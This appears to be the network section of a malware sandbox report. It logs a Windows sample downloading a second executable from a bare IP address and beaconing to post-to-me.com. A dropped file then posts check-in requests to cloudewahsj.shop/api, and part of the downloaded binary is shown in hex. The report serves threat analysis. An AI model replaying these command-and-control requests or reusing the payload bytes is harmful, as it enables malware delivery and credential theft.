                                                                                                  Jan 5, 2025 08:59:24.976636887 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976690054 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976723909 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976771116 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976772070 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:24.976798058 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976833105 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:24.976833105 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976883888 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976897001 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:24.976902008 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976933002 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976944923 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:24.976950884 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976985931 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.976996899 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:24.977000952 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:24.977058887 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.066596031 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.074508905 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.074539900 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.074568033 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.074580908 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.074599028 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.074632883 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.074672937 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.074723005 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.075171947 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.075187922 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.075220108 CET49707443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.075226068 CET44349707104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.307997942 CET49708443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.308056116 CET44349708104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.308315039 CET49708443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.308619022 CET49708443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.308634043 CET44349708104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.771330118 CET44349708104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.771541119 CET49708443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.773111105 CET49708443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.773123980 CET44349708104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.773401022 CET44349708104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:25.774774075 CET49708443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.774774075 CET49708443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:25.774810076 CET44349708104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:26.649908066 CET44349708104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:26.650013924 CET44349708104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:26.650528908 CET49708443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:26.652740002 CET49708443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:26.652760983 CET44349708104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:26.820194960 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:26.820262909 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:26.898324966 CET49709443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:26.898379087 CET44349709104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:26.898448944 CET49709443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:26.898813009 CET49709443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:26.898828983 CET44349709104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:27.378756046 CET44349709104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:27.378894091 CET49709443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:27.380146027 CET49709443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:27.380173922 CET44349709104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:27.380423069 CET44349709104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:27.381752014 CET49709443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:27.381917953 CET49709443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:27.381949902 CET44349709104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:27.382006884 CET49709443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:27.427334070 CET44349709104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:28.098735094 CET44349709104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:28.098834991 CET44349709104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:28.099010944 CET49709443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:28.099198103 CET49709443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:28.099221945 CET44349709104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:28.333718061 CET49710443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:28.333762884 CET44349710104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:28.333859921 CET49710443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:28.334211111 CET49710443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:28.334227085 CET44349710104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:28.790445089 CET44349710104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:28.790525913 CET49710443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:28.791728020 CET49710443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:28.791737080 CET44349710104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:28.791961908 CET44349710104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:28.793138027 CET49710443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:28.793247938 CET49710443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:28.793273926 CET44349710104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:28.793337107 CET49710443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:28.793358088 CET44349710104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:29.805098057 CET44349710104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:29.805202961 CET44349710104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:29.805289030 CET49710443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:29.805361986 CET49710443192.168.2.5104.21.112.1
                                                                                                  Jan 5, 2025 08:59:29.805378914 CET44349710104.21.112.1192.168.2.5
                                                                                                  Jan 5, 2025 09:01:09.048686028 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 09:01:09.437869072 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 09:01:10.137286901 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 09:01:11.437798977 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 09:01:13.937788010 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 09:01:18.828408957 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 09:01:28.437907934 CET4970580192.168.2.5176.113.115.19
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 5, 2025 08:59:19.059652090 CET5686553192.168.2.51.1.1.1
                                                                                                  Jan 5, 2025 08:59:19.219377041 CET53568651.1.1.1192.168.2.5
                                                                                                  Jan 5, 2025 08:59:23.033188105 CET6242253192.168.2.51.1.1.1
                                                                                                  Jan 5, 2025 08:59:23.041403055 CET53624221.1.1.1192.168.2.5
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jan 5, 2025 08:59:19.059652090 CET192.168.2.51.1.1.10xaa70Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:59:23.033188105 CET192.168.2.51.1.1.10x4fb0Standard query (0)cloudewahsj.shopA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jan 5, 2025 08:59:19.219377041 CET1.1.1.1192.168.2.50xaa70No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:59:19.219377041 CET1.1.1.1192.168.2.50xaa70No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:59:23.041403055 CET1.1.1.1192.168.2.50x4fb0No error (0)cloudewahsj.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:59:23.041403055 CET1.1.1.1192.168.2.50x4fb0No error (0)cloudewahsj.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:59:23.041403055 CET1.1.1.1192.168.2.50x4fb0No error (0)cloudewahsj.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:59:23.041403055 CET1.1.1.1192.168.2.50x4fb0No error (0)cloudewahsj.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:59:23.041403055 CET1.1.1.1192.168.2.50x4fb0No error (0)cloudewahsj.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:59:23.041403055 CET1.1.1.1192.168.2.50x4fb0No error (0)cloudewahsj.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                                  Jan 5, 2025 08:59:23.041403055 CET1.1.1.1192.168.2.50x4fb0No error (0)cloudewahsj.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                                  • post-to-me.com
                                                                                                  • cloudewahsj.shop
                                                                                                  • 176.113.115.19
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549705176.113.115.19806536C:\Users\user\Desktop\K27Yg4V48M.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 5, 2025 08:59:20.770675898 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                  User-Agent: ShareScreen
                                                                                                  Host: 176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.449681997 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:59:21 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Last-Modified: Sun, 05 Jan 2025 07:45:02 GMT
                                                                                                  ETag: "50a00-62af0b081a546"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 330240
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1a 24 02 80 5e 45 6c d3 5e 45 6c d3 5e 45 6c d3 e3 0a fa d3 5f 45 6c d3 40 17 e8 d3 7b 45 6c d3 40 17 f9 d3 44 45 6c d3 40 17 ef d3 20 45 6c d3 79 83 17 d3 59 45 6c d3 5e 45 6d d3 24 45 6c d3 40 17 e6 d3 5f 45 6c d3 40 17 f8 d3 5f 45 6c d3 40 17 fd d3 5f 45 6c d3 52 69 63 68 5e 45 6c d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b0 30 64 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1c 04 00 00 52 01 00 00 00 00 00 5f 44 00 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 2c 5e 05 00 02 00 00 80 00 00 [TRUNCATED]
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$$^El^El^El_El@{El@DEl@ ElyYEl^Em$El@_El@_El@_ElRich^ElPEL0dfR_D0@,^<"P`x-@.textl `.data0` @.rsrc`@@
                                                                                                  Jan 5, 2025 08:59:21.449707985 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 24 04 00 32 24 04 00 46 24 04 00 5c 24 04 00 74 24 04 00 8c 24 04 00 a0 24 04 00 be 24 04 00 d2 24 04 00 ec 24 04 00 02 25
                                                                                                  Data Ascii: $2$F$\$t$$$$$$%%.%>%N%b%r%%%%%%%&& &8&H&V&f&z&&&&&^+N+8+(+J'f''''''
                                                                                                  Jan 5, 2025 08:59:21.449724913 CET1236INData Raw: cc 27 04 00 dc 27 04 00 f2 27 04 00 06 28 04 00 1a 28 04 00 26 28 04 00 34 28 04 00 40 28 04 00 4e 28 04 00 58 28 04 00 6e 28 04 00 7a 28 04 00 90 28 04 00 9c 28 04 00 b4 28 04 00 cc 28 04 00 d8 28 04 00 ea 28 04 00 f8 28 04 00 0a 29 04 00 22 29
                                                                                                  Data Ascii: '''((&(4(@(N(X(n(z(((((((()")4)J)d)~)))))))*&*2*<*H*Z*f*v********++,'&&';@~f@kk@
                                                                                                  Jan 5, 2025 08:59:21.449732065 CET1236INData Raw: 65 20 66 6f 72 20 73 74 64 69 6f 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0d 0a 00 00 00 00 52 36 30 32 35 0d 0a 2d 20 70 75 72 65 20 76 69 72 74 75 61 6c 20 66 75 6e 63 74 69 6f 6e 20 63 61 6c 6c 0d 0a 00 00 00 52 36 30 32 34 0d 0a 2d 20 6e
                                                                                                  Data Ascii: e for stdio initializationR6025- pure virtual function callR6024- not enough space for _onexit/atexit tableR6019- unable to open console deviceR6018- unexpected heap errorR6017- unexpected multithread loc
                                                                                                  Jan 5, 2025 08:59:21.449738979 CET1236INData Raw: 63 74 69 76 65 50 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 e0 96 44 00 38 97 44 00 1b 86 40 00 ba 85 40 00 ba 85 40 00 01 02 03 04 05 06 07 08 09 0a
                                                                                                  Data Ascii: ctivePopupGetActiveWindowMessageBoxAUSER32.DLLD8D@@@ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~=_nextafter_logb_yn_y1_y0frexp
                                                                                                  Jan 5, 2025 08:59:21.449749947 CET672INData Raw: 20 00 20 00 20 00 48 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 81 01 81 01 81 01 81 01 81 01
                                                                                                  Data Ascii: H
                                                                                                  Jan 5, 2025 08:59:21.449763060 CET1236INData Raw: 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5
                                                                                                  Data Ascii: tuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                  Jan 5, 2025 08:59:21.449773073 CET1236INData Raw: 79 27 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 00 20 54 79 70 65 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 60 6c 6f 63 61 6c 20 73 74 61 74 69 63 20 74 68 72 65 61 64 20 67 75 61 72 64 27 00 60 6d
                                                                                                  Data Ascii: y' Base Class Descriptor at ( Type Descriptor'`local static thread guard'`managed vector copy constructor iterator'`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dy
                                                                                                  Jan 5, 2025 08:59:21.449784994 CET1236INData Raw: 20 6e 65 77 00 00 00 00 5f 5f 75 6e 61 6c 69 67 6e 65 64 00 5f 5f 72 65 73 74 72 69 63 74 00 00 5f 5f 70 74 72 36 34 00 5f 5f 63 6c 72 63 61 6c 6c 00 00 00 5f 5f 66 61 73 74 63 61 6c 6c 00 00 5f 5f 74 68 69 73 63 61 6c 6c 00 00 5f 5f 73 74 64 63
                                                                                                  Data Ascii: new__unaligned__restrict__ptr64__clrcall__fastcall__thiscall__stdcall__pascal__cdecl__based(+@+@+@+@+@+@+@+@+@+@*@&@&@&@x&@\&@|+@t+@(@p+@l+@h+@d+@`+@\+@P+@L+@H+@D+@@+@
                                                                                                  Jan 5, 2025 08:59:21.449790001 CET1236INData Raw: 00 8d 55 9c 52 6a 00 ff 15 30 10 40 00 31 75 fc 81 3d 9c bc 44 00 13 02 00 00 75 64 6a 00 6a 00 6a 00 6a 00 ff 15 04 10 40 00 8d 85 08 fb ff ff 50 6a 00 ff 15 4c 10 40 00 6a 00 6a 00 ff 15 70 10 40 00 6a 00 6a 00 6a 00 ff 15 74 10 40 00 6a 00 6a
                                                                                                  Data Ascii: URj0@1u=Dudjjjj@PjL@jjp@jjjt@jj(@MQjjj@R@EP@+]=DuMQjjj8@j4@UEEEM33MGa+m}EE8_^X[]Qh
                                                                                                  Jan 5, 2025 08:59:21.454617977 CET1236INData Raw: e4 69 7b 0f 5f c7 45 ac de 6b 83 15 c7 45 c0 ab 80 bf 6e c7 45 ec b7 68 8f 08 c7 45 d4 fa 46 34 32 c7 45 c4 db 82 fb 31 c7 45 d0 a3 2f 68 22 c7 45 bc 48 3e 25 1f c7 45 f8 b9 fb 1e 30 c7 45 b0 a7 b7 52 05 c7 45 f4 ef 8c f5 4e c7 45 d8 18 1f c5 71
                                                                                                  Data Ascii: i{_EkEnEhEF42E1E/h"EH>%E0ERENEqEzE:[<EN!EEo0Ej*3m+VEm!wm[E#mm"Jm.LVmh emE?0m,CMEamqt2EP$mV`Mm('EmfEL=


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549704104.21.56.704436536C:\Users\user\Desktop\K27Yg4V48M.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:59:19 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                  User-Agent: ShareScreen
                                                                                                  Host: post-to-me.com
                                                                                                  2025-01-05 07:59:20 UTC812INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:59:20 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PBxC7vQz1YildFIe%2FQ%2F55LE3s7xWeD4io%2F8ATbftVFfTQWVcVEcDYx3m%2BmUNTBC%2Fx7SHTCLa8Y09Yn33pDAK%2Bf8N%2BjV627X5CLt9Vj3MSc%2BNjPRK6ybmFPD9CW%2B03v8D7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1eda52e2f4213-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=598&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1815920&cwnd=229&unsent_bytes=0&cid=4c5b9b80b07a4738&ts=403&x=0"
                                                                                                  2025-01-05 07:59:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                  Data Ascii: 2ok
                                                                                                  2025-01-05 07:59:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.549706104.21.112.14436556C:\Users\user\AppData\Local\Temp\1831.tmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:59:23 UTC263OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 8
                                                                                                  Host: cloudewahsj.shop
                                                                                                  2025-01-05 07:59:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                  Data Ascii: act=life
                                                                                                  2025-01-05 07:59:23 UTC1123INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:59:23 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=h7mm4o2fdvsc3u3pc6ecdmpt2c; expires=Thu, 01 May 2025 01:46:02 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j5lBkdtdIxwrlSrYrIyApoiMM56cS%2FBGPHo7elc6FOFf9VEaUaoT4%2FOdeecDRGjJc6KTbb%2FteRRK0pUibPyVldZaiYp6wtwFgquyyU0ojTgQMI0rwKSUWT04SuVUIN1p773%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1edbd69b20f5b-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1681&rtt_var=640&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=907&delivery_rate=1698662&cwnd=221&unsent_bytes=0&cid=45049a4a191e844f&ts=471&x=0"
                                                                                                  2025-01-05 07:59:23 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                  Data Ascii: 2ok
                                                                                                  2025-01-05 07:59:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.549707104.21.112.14436556C:\Users\user\AppData\Local\Temp\1831.tmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:59:24 UTC264OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 74
                                                                                                  Host: cloudewahsj.shop
                                                                                                  2025-01-05 07:59:24 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                                                  2025-01-05 07:59:24 UTC1119INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:59:24 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=nb8djldoi12puimmia5avcimov; expires=Thu, 01 May 2025 01:46:03 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LtqbKZNAGAm%2BbRTHHigFwEEQJovUlxSMkK31qe%2BUvB2Y3rVjFgeenpTMFBCLD04CAPD7FXAJ2eL5rxm3gUnfvkG7YV1EBzFXhF6o4A1b0OsctMMQZD1TkOXOSAz7oRFW1GJy"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1edc25e31424b-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1590&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=974&delivery_rate=1821584&cwnd=248&unsent_bytes=0&cid=c8bd4e61e4bfe1d9&ts=514&x=0"
                                                                                                  2025-01-05 07:59:24 UTC250INData Raw: 32 34 63 32 0d 0a 61 57 76 35 54 6d 66 44 41 6c 4a 67 6a 6c 56 53 70 2b 31 63 6a 4c 47 59 6c 2b 75 7a 64 61 6e 32 77 48 69 6e 64 51 68 44 6f 4c 77 53 53 59 39 73 58 66 63 75 63 42 50 72 64 32 6a 54 6e 79 6e 70 6e 62 72 32 6a 35 46 50 7a 35 65 73 43 38 4a 5a 4b 6a 58 4e 6e 6c 4d 4e 6d 43 49 55 70 69 35 77 42 66 5a 33 61 50 79 57 66 75 6e 66 75 71 33 4a 31 68 2f 4c 6c 36 77 61 78 68 35 6e 4d 38 7a 66 41 51 65 65 4a 67 4b 67 5a 6a 4d 4d 34 7a 41 33 77 6f 77 32 34 74 6a 31 2f 34 61 52 57 59 75 54 75 6c 71 64 56 30 55 6d 31 4e 30 6b 43 6f 6f 6c 52 62 34 75 4b 55 4c 72 4f 33 43 64 7a 7a 33 70 30 2f 54 78 6a 39 67 64 77 5a 36 6b 47 38 4d 66 65 43 72 47 31 41 45 4a 6e 53 63 49 71 58 49 2b 42 75 51 37 4d 63 69 4d 66 71 43 54 2f 65 33 4a 69 56 65 59
